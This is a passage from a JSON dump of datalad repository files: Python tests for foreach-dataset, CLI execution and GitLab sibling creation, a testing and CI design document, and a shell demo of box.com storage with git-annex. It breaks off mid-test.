'subds_modified'])\n else:\n ok_clean_git(ds.path)\n\n\[email protected](\"populator\", [\n # empty dataset\n create,\n # ver much not empty dataset\n get_deeply_nested_structure,\n])\ndef test_basic_resilience(populator):\n check_basic_resilience(populator)\n\n\n@with_tempfile(mkdir=True)\ndef check_python_eval(cmd, path):\n ds = Dataset(path).create()\n res = ds.foreach_dataset(cmd, cmd_type='eval')\n eq_(len(res), 1)\n expected_variables = {'ds', 'pwd', 'refds'}\n eq_(expected_variables.intersection(res[0]['result']), expected_variables)\n # besides expected, there could be few more ATM, +5 arbitrarily just to test\n # that we are not leaking too much\n assert_greater(len(expected_variables) + 5, len(res[0]['result']))\n\n\n@with_tempfile(mkdir=True)\ndef check_python_exec(cmd, path):\n ds = Dataset(path).create()\n sub = ds.create('sub') # create subdataset for better coverage etc\n\n # but exec has no result\n res = ds.foreach_dataset(cmd, cmd_type='exec')\n assert_not_in('result', res[0])\n\n # but allows for more complete/interesting setups in which we could import modules etc\n cmd2 = 'import os, sys; print(f\"DIR: {os.linesep.join(dir())}\")'\n with swallow_outputs() as cmo:\n res1 = ds.foreach_dataset(cmd2, output_streams='capture', cmd_type='exec')\n assert_in('ds', res1[0]['stdout'])\n assert_in('sys', res1[0]['stdout'])\n eq_(res1[0]['stderr'], '')\n # default renderer for each dataset\n assert cmo.out.startswith(f'foreach-dataset(ok): {path}')\n assert f'foreach-dataset(ok): {sub.path}' in cmo.out\n\n with swallow_outputs() as cmo:\n res2 = ds.foreach_dataset(cmd2, output_streams='relpath', cmd_type='exec')\n # still have the same res\n assert res1 == res2\n # but we have \"fancier\" output\n assert cmo.out.startswith(f'DIR: ')\n # 2nd half should be identical to 1st half but with lines prefixed with sub/ path\n lines = cmo.out.splitlines()\n half = len(lines) // 2\n assert [op.join('sub', l) for l in lines[:half]] == lines[half:]\n assert 'foreach-dataset(ok)' not in cmo.out\n\n\ndef test_python():\n check_python_eval(\"dir()\")\n check_python_exec(\"dir()\")\n\n def dummy_dir(*args, **kwargs):\n \"\"\"Ensure that we pass all placeholders as kwargs\"\"\"\n assert not args\n return kwargs\n\n check_python_eval(dummy_dir) # direct function invocation\n" }, { "alpha_fraction": 0.7329742908477783, "alphanum_fraction": 0.7373175621032715, "avg_line_length": 57.141414642333984, "blob_id": "b43a1b85e2a90075ecaacb259df02c6ef4374c14", "content_id": "bf0319e27896355b1cf7b259c428bb0ff2bf508a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5756, "license_type": "permissive", "max_line_length": 263, "num_lines": 99, "path": "/docs/source/design/testing.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_testing:\n\n**********************************\nContinuous integration and testing\n**********************************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nDataLad is tested using a pytest-based testsuite that is run locally and via continuous integrations setups.\nCode development should ensure that old and new functionality is appropriately tested.\nThe project aims for good unittest coverage (at least 80%).\n\nRunning tests\n=============\n\n\nStarting at the top level with ``datalad/tests``, every module in the package comes with a subdirectory ``tests/``, containing the tests for that portion of the codebase. This structure is meant to simplify (re-)running the tests for a particular module.\nThe test suite is run using\n\n.. code-block:: bash\n\n pip install -e .[tests]\n python -m pytest -c tox.ini datalad\n # or, with coverage reports\n python -m pytest -c tox.ini --cov=datalad datalad\n\nIndividual tests can be run using a path to the test file, followed by two colons and the test name:\n\n.. code-block:: bash\n\n python -m pytest datalad/core/local/tests/test_save.py::test_save_message_file\n\nThe set of to-be-run tests can be further sub-selected with environment variable based configurations that enable tests based on their :ref:`decorators`, or pytest-specific parameters.\nInvoking a test run using ``DATALAD_TESTS_KNOWNFAILURES_PROBE=True pytest datalad``, for example, will run tests marked as known failures whether or not they still fail.\nSee section :ref:`configuration` for all available configurations.\nInvoking a test run using ``DATALAD_TESTS_SSH=1 pytest -m xfail -c tox.ini datalad`` will run only those tests marked as `xfail <https://docs.pytest.org/en/latest/how-to/skipping.html>`_.\n\nLocal setup\n-----------\nLocal test execution usually requires a local installation with all development requirements. It is recommended to either use a `virtualenv <https://virtualenv.pypa.io/en/latest/>`_, or `tox <https://tox.wiki/en/latest/>`_ via a ``tox.ini`` file in the code base.\n\nCI setup\n--------\nAt the moment, Travis-CI, Appveyor, and GitHub Workflows exercise the tests battery for every PR and on the default branch, covering different operating systems, Python versions, and file systems.\nTests should be ran on the oldest, latest, and current stable Python release.\nThe projects uses https://codecov.io for an overview of code coverage.\n\n\nWriting tests\n=============\n\nAdditional functionality is tested by extending existing similar tests with new test cases, or adding new tests to the respective test script of the module. Generally, every file `example.py `with datalad code comes with a corresponding `tests/test_example.py`.\nTest helper functions assisting various general and DataLad specific assertions as well the construction of test directories and files can be found in ``datalad/tests/utils_pytest.py``.\n\n.. _decorators:\n\nTest annotations\n----------------\n\n``datalad/tests/utils_pytest.py`` also defines test decorators.\nSome of those are used to annotate tests for various aspects to allow for easy sub-selection via environment variables.\n\n**Speed**: Please annotate tests that take a while to complete with following decorators\n\n* ``@slow`` if test runs over 10 seconds\n* ``@turtle`` if test runs over 120 seconds (those would not typically be ran on CIs)\n\n**Purpose**: Please further annotate tests with a special purpose specifically. As those tests also usually tend to be slower, use in conjunction with ``@slow`` or ``@turtle`` when slow.\n\n* ``@integration`` - tests verifying correct operation with external tools/services beyond git/git-annex\n* ``@usecase`` - represents some (user) use-case, and not necessarily a \"unit-test\" of functionality\n\n**Dysfunction**: If tests are not meant to be run on certain platforms or under certain conditions, ``@known_failure`` or ``@skip`` annotations can be used. Examples include:\n\n* ``@skip``, ``@skip_if_on_windows``, ``@skip_ssh``, ``@skip_wo_symlink_capability``, ``@skip_if_adjusted_branch``, ``@skip_if_no_network``, ``@skip_if_root``\n* ``@knownfailure``, ``@known_failure_windows``, ``known_failure_githubci_win`` or ``known_failure_githubci_osx``\n\n\nMigrating tests from nose to pytest\n===================================\n\nDataLad's test suite has been migrated from `nose <https://nose.readthedocs.io/en/latest/>`_ to `pytest <https://docs.pytest.org/en/latest/contents.html>`_ in the `0.17.0 release <https://github.com/datalad/datalad/releases/tag/0.17.0>`_.\nThis might be relevant for DataLad extensions that still use nose.\n\nFor the time being, ``datalad.tests.utils`` keeps providing ``nose``-based utils, and ``datalad.__init__`` keeps providing nose-based fixtures to not break extensions that still use nose for testing.\nA migration to ``pytest`` is recommended, though.\nTo perform a typical migration of a DataLad extension to use pytest instead of nose, go through the following list:\n\n* keep all the ``assert_*`` and ``ok_`` helpers, but import them from ``datalad.tests.utils_pytest`` instead\n* for ``@with_*`` and other decorators populating positional arguments, convert corresponding posarg to kwarg by adding ``=None``\n* convert all generator-based parametric tests into direct invocations or, preferably, ``@pytest.mark.parametrized`` tests\n* address ``DeprecationWarnings`` in the code. Only where desired to test deprecation, add ``@pytest.mark.filterwarnings(\"ignore: BEGINNING OF WARNING\")`` decorator to the test.\n\nFor an example, see a \"migrate to pytest\" PR against ``datalad-deprecated``: `datalad/datalad-deprecated#51 <https://github.com/datalad/datalad-deprecated/pull/51>`_ .\n" }, { "alpha_fraction": 0.5896387100219727, "alphanum_fraction": 0.5937287211418152, "avg_line_length": 32.34090805053711, "blob_id": "53db01d6452235b45dd2a3bd7a84445dc8c1bc94", "content_id": "e852db74dd816bb6d5f8628f8a6e3d3af94766ec", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1467, "license_type": "permissive", "max_line_length": 87, "num_lines": 44, "path": "/datalad/customremotes/tests/test_main.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for the \"main\" driver of the special remotes\"\"\"\n\nimport logging\nimport os\nimport pytest\n\nfrom ..main import main\n\nfrom ..base import AnnexCustomRemote\n\nfrom datalad.tests.utils_pytest import (\n patch,\n swallow_logs,\n swallow_outputs,\n)\nfrom datalad.ui import ui\n\n\ndef test_erroring_out():\n class TooAbstract(AnnexCustomRemote):\n pass\n\n # patch to not let `main` change the ui.backend\n # of the test process (instead of a special remote process it is actually\n # targeting)\n with swallow_logs(new_level=logging.DEBUG) as cml, \\\n swallow_outputs() as cmo:\n with pytest.raises(SystemExit) as cme,\\\n patch.object(ui, \"set_backend\", autospec=True):\n main(args=[], cls=TooAbstract)\n assert cme.value.code == 1\n assert 'passing ERROR to git-annex' in cml.out\n # verify basic correct formatting of string to git-annex\n assert cmo.out.startswith('ERROR ')\n assert os.linesep not in cmo.out.rstrip()\n assert cmo.out.endswith('\\n') # This is the case even on Windows.\n" }, { "alpha_fraction": 0.7846153974533081, "alphanum_fraction": 0.7846153974533081, "avg_line_length": 20.66666603088379, "blob_id": "96c81803cddf4cefe75b5486f7a919891255098d", "content_id": "c1ba919b94d8ff87a41ec099cf336a31154eb02c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 65, "license_type": "permissive", "max_line_length": 26, "num_lines": 3, "path": "/tools/coverage-bin/sitecustomize.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport coverage\ncoverage.process_startup()\n" }, { "alpha_fraction": 0.7729646563529968, "alphanum_fraction": 0.7757296562194824, "avg_line_length": 68.25531768798828, "blob_id": "26b1b3ff6fefb39c7130b57a4ffcacad09addbf5", "content_id": "327e2ad3f588fc4f3368764fa3b3e7c9c006b10e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3255, "license_type": "permissive", "max_line_length": 332, "num_lines": 47, "path": "/docs/casts/boxcom.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"Many people that need to exchange data use cloud storage services.\"\nsay \"One of these services is 'box.com' -- they offer similar features as dropbox, but provide more storage for free (10GB at the moment)\"\nsay \"Here is how DataLad can be configured to use box.com for data storage and exchange...\"\n\nsay \"For the purpose of this demo, we'll set up a dataset that contains a 1MB file with some random binary data\"\nrun \"datalad create demo\"\nrun \"cd demo\"\nrun \"datalad run dd if=/dev/urandom of=big.dat bs=1M count=1\"\n\nsay \"Next we configure box.com as a remote storage location, using a git-annex command.\"\nsay \"Git-annex requires the login credentials to be given as environment variables WEBDAV_USERNAME and WEBDAV_PASSWORD. This demo uses a script that hides the real credentials\"\nrun \". ~/box.com_work.sh\"\n\nsay \"Now for the actual box.com configuration.\"\nsay \"Key argument is the access URL: 'team/project_one' is where the data will be stored in the box.com account.\"\nrun \"git annex initremote box.com type=webdav url=https://dav.box.com/dav/team/project_one chunk=50mb encryption=none\"\nsay \"The 'chunk' and 'encryption' arguments further tailor the setup. Files will be automatically split into chunks less than 50MB. This make synchronization faster, and allows for storing really large files. File can be encrypted before upload to prevent access without a secure key -- for this demo we opted to not use encryption\"\n\nsay \"The next step is optional\"\nsay \"We set up a (possibly private) GitHub repo to exchange/synchronize the dataset itself (but not its data). If you just want to have off-site data storage, but no collaboration with others, this is not needed\"\nsay \"For this demo we opt to create the dataset at github.com/datalad/exchange-demo\"\nrun \"datalad create-sibling-github --github-organization datalad --publish-depends box.com --access-protocol ssh exchange-demo\"\nsay \"We configured DataLad to automatically copy data over to box.com when the dataset is published to GitHub, so we can achieve both in one step:\"\n\nrun \"datalad publish --to github big.dat\"\nrun \"git annex whereis\"\nsay \"The data file was automatically copied to box.com\"\n\nsay \"Now let's see how a collaborator could get access to the data(set)\"\nsay \"Anyone with permission to access the dataset on GitHub can install it\"\nrun \"cd ../\"\nrun \"datalad install -s [email protected]:datalad/exchange-demo.git fromgh\"\n\nsay \"DataLad has reported the presence of a storage sibling 'box.com'\"\nsay \"Anyone with permission to access a box.com account that the original box.com folder has been shared with can get access to the stored content\"\nrun \"datalad siblings -d ~/fromgh enable -s box.com\"\nsay \"If DataLad does not yet know about a user's box.com account, the above command would have prompted the user to provide access credentials\"\n\nsay \"Let's confirm that the newly installed dataset is only aware of the GitHub and box.com locations\"\nrun \"cd fromgh\"\nrun \"git remote -v\"\n\nsay \"Now we can obtain the data file, without having to worry about where exactly it is hosted\"\nrun \"datalad get big.dat\"\nrun \"ls -sLh big.dat\"\n\nsay \"Similar configurations are possible for any data storage solutions supported by git-annex. See https://git-annex.branchable.com/special_remotes for more info.\"\n" }, { "alpha_fraction": 0.5954577922821045, "alphanum_fraction": 0.5958126187324524, "avg_line_length": 31.017045974731445, "blob_id": "7b79f0961ec0cf67fa497206ed987392e7793dd6", "content_id": "542f3761d0d4000fdeba7699a0fcc4cb57603b01", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5636, "license_type": "permissive", "max_line_length": 117, "num_lines": 176, "path": "/datalad/cli/tests/test_exec.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import argparse\nfrom argparse import Namespace\n\nimport pytest\n\nfrom datalad.interface.base import Interface\nfrom datalad.support.param import Parameter\nfrom datalad.tests.utils_pytest import (\n assert_not_in,\n eq_,\n patch_config,\n)\nfrom datalad.utils import updated\n\nfrom ..exec import (\n _get_result_filter,\n call_from_parser,\n)\nfrom ..parser import (\n parser_add_common_options,\n setup_parser_for_interface,\n)\n\n\ndef _args(**kwargs):\n return Namespace(\n # ATM duplicates definitions done by cmdline.main and\n # required by code logic to be defined. (should they?)\n #\n # TODO: The common options are now added by\n # cmdline.helpers.parser_add_common_options(), which can be reused by\n # tests.\n **updated(\n dict(\n common_result_renderer=\"generic\"\n ),\n kwargs\n )\n )\n\n\ndef _new_args(**kwargs):\n # A few more must be specified\n return _args(\n **updated(\n dict(\n common_on_failure=None, # ['ignore', 'continue', 'stop']\n common_report_status=None, # ['all', 'success', 'failure', 'ok', 'notneeded', 'impossible', 'error']\n common_report_type=None, # ['dataset', 'file']\n ),\n kwargs\n )\n )\n\n\n\n\ndef test_call_from_parser_old_style():\n # test that old style commands are invoked without any additional arguments\n class DummyOne(Interface):\n @staticmethod\n def __call__(arg=None):\n eq_(arg, \"nothing\")\n return \"magical\"\n val = call_from_parser(DummyOne, _args(arg=\"nothing\"))\n eq_(val, \"magical\")\n\n\ndef test_call_from_parser_old_style_generator():\n # test that old style commands are invoked without any additional arguments\n class DummyOne(Interface):\n @staticmethod\n def __call__(arg=None):\n eq_(arg, \"nothing\")\n yield \"nothing is\"\n yield \"magical\"\n val = call_from_parser(DummyOne, _args(arg=\"nothing\"))\n eq_(val, [\"nothing is\", \"magical\"])\n\n\ndef test_call_from_parser_default_args():\n class DummyOne(Interface):\n # explicitly without @eval_results\n @staticmethod\n def __call__(arg=None, **kwargs):\n eq_(kwargs['common_on_failure'], None)\n eq_(kwargs['common_report_status'], None)\n eq_(kwargs['common_report_type'], None)\n # and even those we didn't pass\n eq_(kwargs['common_result_renderer'], \"generic\")\n # with dissolution of _OLD_STYLE_COMMANDS yoh yet to find\n # a real interface which had return_type (defined in\n # eval_params) but no @eval_results\n # eq_(kwargs['return_type'], \"generator\")\n eq_(arg, \"nothing\")\n yield \"nothing is\"\n yield \"magical\"\n\n # just to be sure no evil spirits chase away our Dummy\n val = call_from_parser(DummyOne, _new_args(arg=\"nothing\"))\n eq_(val, [\"nothing is\", \"magical\"])\n\n\ndef test_call_from_parser_result_filter():\n class DummyOne(Interface):\n @staticmethod\n def __call__(**kwargs):\n yield kwargs\n\n # call_from_parser doesn't add result_filter to the keyword arguments\n assert_not_in(\"result_filter\",\n call_from_parser(DummyOne, _new_args())[0])\n # with dissolution of _OLD_STYLE_COMMANDS and just relying on having\n # @eval_results, no result_filter is added, since those commands are\n # not guaranteed to return/yield any record suitable for filtering.\n # The effect is the same -- those \"common\" options are not really applicable\n # to Interface's which do not return/yield expected records\n assert_not_in(\n \"result_filter\",\n call_from_parser(\n DummyOne,\n _new_args(common_report_type=\"dataset\"))[0])\n\n\ndef test_get_result_filter_arg_vs_config():\n # just tests that we would be obtaining the same constraints via\n # cmdline argument or via config variable. With cmdline overloading\n # config\n f = _get_result_filter\n eq_(f(_new_args()), None) # by default, no filter\n\n for v in \"success\", \"failure\", \"ok\", \"notneeded\", \"error\":\n cargs = f(_new_args(common_report_status=v))\n assert cargs is not None\n with patch_config({\"datalad.runtime.report-status\": v}):\n ccfg = f(_new_args())\n ccfg_none = f(_new_args(common_report_status=\"all\"))\n # cannot compare directly but at least could verify based on repr\n print(\"%s -> %s\" % (v, repr(cargs)))\n eq_(repr(cargs), repr(ccfg))\n # and if 'all' - none filter\n eq_(None, ccfg_none)\n\n # and we overload the \"error\" in config\n with patch_config({\"datalad.runtime.report-status\": \"error\"}):\n cargs_overload = f(_new_args(common_report_status=v))\n eq_(repr(cargs), repr(cargs_overload))\n\n\[email protected](\n \"how\",\n [\"bare\", \"dest\", \"args\"]\n)\ndef test_call_from_parser_pos_arg_underscore(how):\n kwds = {\"doc\": \"pos_arg doc\"}\n if how == \"dest\":\n kwds[\"dest\"] = \"pos_arg\"\n elif how == \"args\":\n kwds[\"args\"] = (\"pos_arg\",)\n elif how != \"bare\":\n raise AssertionError(\"Unrecognized how: {}\".format(how))\n\n class Cmd(Interface):\n\n _params_ = dict(\n pos_arg=Parameter(**kwds))\n\n def __call__(pos_arg, **kwargs):\n return pos_arg\n\n parser = argparse.ArgumentParser()\n parser_add_common_options(parser)\n setup_parser_for_interface(parser, Cmd)\n args = parser.parse_args([\"val\"])\n eq_(call_from_parser(Cmd, args),\n \"val\")\n\n" }, { "alpha_fraction": 0.5781345963478088, "alphanum_fraction": 0.5862184166908264, "avg_line_length": 37.491416931152344, "blob_id": "f31afade7060699b9f48ffbb7e1df5e8a627878f", "content_id": "a2c9a5d130dd8c4ac8a3fd2fbb0516359d7cb3d1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17937, "license_type": "permissive", "max_line_length": 95, "num_lines": 466, "path": "/datalad/distributed/tests/test_create_sibling_gitlab.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on gitlab\"\"\"\n\nimport os\nimport pytest\n# this must import ok with and without gitlab\nfrom datalad.api import (\n Dataset,\n create,\n create_sibling_gitlab,\n)\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n eq_,\n with_tempfile,\n)\nfrom datalad.utils import chpwd\n\n\ndef _get_nested_collections(path):\n ds = Dataset(path).create()\n c1 = ds.create(ds.pathobj / 'subdir' / 'collection1')\n c1s1 = c1.create('sub1')\n c1s2 = c1.create('sub2')\n c2 = ds.create('collection2')\n c2s1 = c2.create('sub1')\n c2s11 = c2s1.create('deepsub1')\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n # return a catalog\n return dict(\n root=ds,\n c1=c1,\n c1s1=c1s1,\n c1s2=c1s2,\n c2=c2,\n c2s1=c2s1,\n c2s11=c2s11,\n )\n\n\n# doesn't actually need gitlab and exercises most of the decision logic\n@with_tempfile\ndef test_dryrun(path=None):\n ctlg = _get_nested_collections(path)\n # no site config -> error\n assert_raises(ValueError, ctlg['root'].create_sibling_gitlab)\n # wrong path specification -> impossible result\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n site='dummy', path='imaghost'\n )\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, path=ctlg['root'].pathobj / 'imaghost', type='dataset',\n status='impossible')\n # single project vs multi-dataset call\n assert_raises(\n ValueError,\n ctlg['root'].create_sibling_gitlab,\n site='site', project='one', recursive=True)\n assert_raises(\n ValueError,\n ctlg['root'].create_sibling_gitlab,\n site='site', project='one', path=['one', 'two'])\n # explicit cite, no path constraints, fails for lack of project path config\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n site='dummy',\n )\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='error',\n site='dummy', sibling='dummy',\n )\n # now a working, fully manual call\n for p in (None, ctlg['root'].path):\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n site='dummy', project='here',\n path=p,\n )\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n site='dummy', sibling='dummy', project='here/project',\n )\n\n # now configure a default gitlab site\n ctlg['root'].config.set('datalad.gitlab-default-site', 'theone')\n # we don't need to specify one anymore, but we can still customize\n # the sibling name\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n name='ursula', project='here',\n )\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n site='theone', sibling='ursula', project='here/project',\n )\n # now configure a sibling name for this site\n ctlg['root'].config.set('datalad.gitlab-theone-siblingname', 'dieter')\n # and another one for another site\n ctlg['root'].config.set('datalad.gitlab-otherone-siblingname', 'ulf')\n # no need to specific 'name' anymore\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n project='here',\n )\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n site='theone', sibling='dieter', project='here/project',\n )\n # properly switches the name based on site\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n site='otherone', project='here',\n )\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n site='otherone', sibling='ulf', project='here/project',\n )\n # reports notneeded on existing='skip' with an existing remote\n ctlg['root'].repo.add_remote('dieter', 'http://example.com')\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n project='here', existing='skip',\n )\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='notneeded',\n site='theone', sibling='dieter',\n )\n ctlg['root'].repo.remove_remote('dieter')\n\n # lastly, configure a project path\n ctlg['root'].config.set('datalad.gitlab-theone-project', 'secret')\n # now we can drive it blind\n res = ctlg['root'].create_sibling_gitlab(dry_run=True)\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n site='theone', sibling='dieter', project='secret/project',\n )\n # we can make use of the config in the base dataset to drive\n # calls on subdatasets: use -d plus a path\n res = ctlg['root'].create_sibling_gitlab(path='subdir', dry_run=True)\n # only a single result, doesn't touch the parent\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, path=ctlg['c1'].path, type='dataset', status='ok',\n site='theone', sibling='dieter',\n # collection setup: superdataset becomes group name and \"project\"\n # project underneath, subdirectories and subdatasets are projects\n # with path separators replaced underneath the group.\n project='secret/{}'.format(str(\n ctlg['c1'].pathobj.relative_to(ctlg['root'].pathobj)).replace(\n os.sep, '-')),\n )\n # we get the same result with an explicit layout request\n expl_res = ctlg['root'].create_sibling_gitlab(\n path='subdir', layout='collection', dry_run=True)\n eq_(res, expl_res)\n # layout can be configured too, \"collection\" is \"flat\" in a group\n ctlg['root'].config.set('datalad.gitlab-theone-layout', 'collection')\n res = ctlg['root'].create_sibling_gitlab(\n path='subdir', dry_run=True)\n assert_result_count(\n res, 1, path=ctlg['c1'].path, type='dataset', status='ok',\n # http://site/group/dir-dir-dir-name.git\n project='secret/{}'.format(str(\n ctlg['c1'].pathobj.relative_to(ctlg['root'].pathobj)).replace(\n os.sep, '-')),\n )\n # make sure the reference dataset does not conflict with its group in this\n # case\n res = ctlg['root'].create_sibling_gitlab(dry_run=True)\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n project='secret/project')\n # \"flat\" does GitHub-style\n ctlg['root'].config.set('datalad.gitlab-theone-layout', 'flat')\n res = ctlg['root'].create_sibling_gitlab(\n path='subdir', dry_run=True)\n assert_result_count(\n res, 1, path=ctlg['c1'].path, type='dataset', status='ok',\n # http://site/base-dir-dir-dir-name.git\n project='secret-{}'.format(str(\n ctlg['c1'].pathobj.relative_to(ctlg['root'].pathobj)).replace(\n os.sep, '-')),\n )\n\n # the results do not depend on explicitly given datasets, if we just enter\n # the parent dataset we get the same results\n with chpwd(str(ctlg['root'].pathobj / 'subdir')):\n rel_res = create_sibling_gitlab(path=os.curdir, dry_run=True)\n eq_(res, rel_res)\n # and again the same results if we are in a subdataset and point to a parent\n # dataset as a reference and config provider\n with chpwd(ctlg['c1'].path):\n rel_res = create_sibling_gitlab(\n dataset=ctlg['root'].path, path=os.curdir, dry_run=True)\n eq_(res, rel_res)\n\n # blows on unknown layout\n ctlg['root'].config.unset('datalad.gitlab-theone-layout')\n assert_raises(\n ValueError,\n ctlg['root'].create_sibling_gitlab, layout='funny', dry_run=True)\n\n # and finally recursion\n res = ctlg['root'].create_sibling_gitlab(recursive=True, dry_run=True)\n # one result per dataset\n assert_result_count(res, len(ctlg))\n # verbose check of target layout (easier to see target pattern for humans)\n # default layout: collection\n expected_collection_res = [\n 'secret/collection2',\n 'secret/collection2-sub1',\n 'secret/collection2-sub1-deepsub1',\n 'secret/project',\n 'secret/subdir-collection1',\n 'secret/subdir-collection1-sub1',\n 'secret/subdir-collection1-sub2',\n ]\n eq_(\n sorted(r['project'] for r in res),\n expected_collection_res\n )\n # should be the same when explicitly requested\n res = ctlg['root'].create_sibling_gitlab(\n recursive=True, layout='collection', dry_run=True)\n assert_result_count(res, len(ctlg))\n eq_(\n sorted(r['project'] for r in res),\n expected_collection_res\n )\n res = ctlg['root'].create_sibling_gitlab(\n recursive=True, layout='flat', dry_run=True)\n assert_result_count(res, len(ctlg))\n eq_(\n sorted(r['project'] for r in res),\n [\n 'secret',\n 'secret-collection2',\n 'secret-collection2-sub1',\n 'secret-collection2-sub1-deepsub1',\n 'secret-subdir-collection1',\n 'secret-subdir-collection1-sub1',\n 'secret-subdir-collection1-sub2',\n ],\n )\n # test that the configurations work\n ctlg['root'].config.set(\"datalad.gitlab-default-projectname\", 'myownname')\n ctlg['c1s1'].config.set(\"datalad.gitlab-default-pathseparator\", '+')\n res = ctlg['root'].create_sibling_gitlab(\n recursive=True, layout='flat', dry_run=True)\n assert_result_count(res, len(ctlg))\n eq_(\n sorted(r['project'] for r in res),\n [\n 'secret',\n 'secret+subdir+collection1+sub1',\n 'secret-collection2',\n 'secret-collection2-sub1',\n 'secret-collection2-sub1-deepsub1',\n 'secret-subdir-collection1',\n 'secret-subdir-collection1-sub2',\n ],\n )\n res = ctlg['root'].create_sibling_gitlab(\n recursive=True, layout='collection', dry_run=True)\n assert_result_count(res, len(ctlg))\n eq_(\n sorted(r['project'] for r in res),\n [\n 'secret/collection2',\n 'secret/collection2-sub1',\n 'secret/collection2-sub1-deepsub1',\n 'secret/myownname',\n 'secret/subdir+collection1+sub1',\n 'secret/subdir-collection1',\n 'secret/subdir-collection1-sub2',\n ],\n )\n # test for #7429: when a subdataset is uninstalled, recursion must\n # not crash with KeyError\n ctlg['root'].drop(['subdir/collection1', 'collection2'],\n what='datasets', recursive=True, reckless='kill')\n try:\n res = ctlg['root'].create_sibling_gitlab(\n recursive=True, layout='collection', dry_run=True,\n on_failure='ignore')\n except TypeError:\n pytest.fail(\"Crashed with TypeError on uninstalled datasets\")\n\n\nclass _FakeGitLab(object):\n def __init__(self, site):\n pass\n\n\nclass _NewProjectGitLab(_FakeGitLab):\n def get_project(self, path):\n return None\n\n def create_project(self, path, description=None):\n return dict(\n http_url_to_repo='http://example.com',\n ssh_url_to_repo='example.com',\n description=description,\n )\n\n\nclass _ExistingProjectGitLab(_FakeGitLab):\n def get_project(self, path):\n return dict(\n http_url_to_repo='http://example.com',\n ssh_url_to_repo='example.com',\n )\n\n\nclass _ExistingProjectOtherURLGitLab(_FakeGitLab):\n def get_project(self, path):\n return dict(\n http_url_to_repo='http://example2.com',\n ssh_url_to_repo='example2.com',\n )\n\n\nclass _CreateFailureGitLab(_FakeGitLab):\n def get_project(self, path):\n None\n\n def create_project(self, path, description=None):\n raise RuntimeError\n\n\n@with_tempfile\ndef test_fake_gitlab(path=None):\n from unittest.mock import patch\n ds = Dataset(path).create()\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\", _NewProjectGitLab):\n res = ds.create_sibling_gitlab(site='dummy', project='here', description='thisisit')\n assert_result_count(res, 2)\n # GitLab success\n assert_result_count(\n res, 1, action='create_sibling_gitlab', path=path, type='dataset',\n site='dummy', sibling='dummy', project='here/project', description='thisisit',\n project_attributes={\n 'http_url_to_repo': 'http://example.com',\n 'ssh_url_to_repo': 'example.com',\n 'description': 'thisisit'\n },\n status='ok')\n assert_result_count(\n res, 1, action='configure-sibling', path=path, name='dummy',\n url='http://example.com', status='ok')\n\n # test sibling name conflicts\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\", _ExistingProjectGitLab):\n res = ds.create_sibling_gitlab(path=ds.path, site='dummy',\n project='here', existing='skip')\n assert_result_count(res, 1)\n assert_result_count(\n res, 0, action='create_sibling_gitlab',\n message=['already has a configured sibling \"%s\"', \"dummy\"],\n path=path,\n refds=path,\n site='dummy', sibling='dummy',\n status='notneeded',\n type='dataset'\n )\n # sibling name conflict with 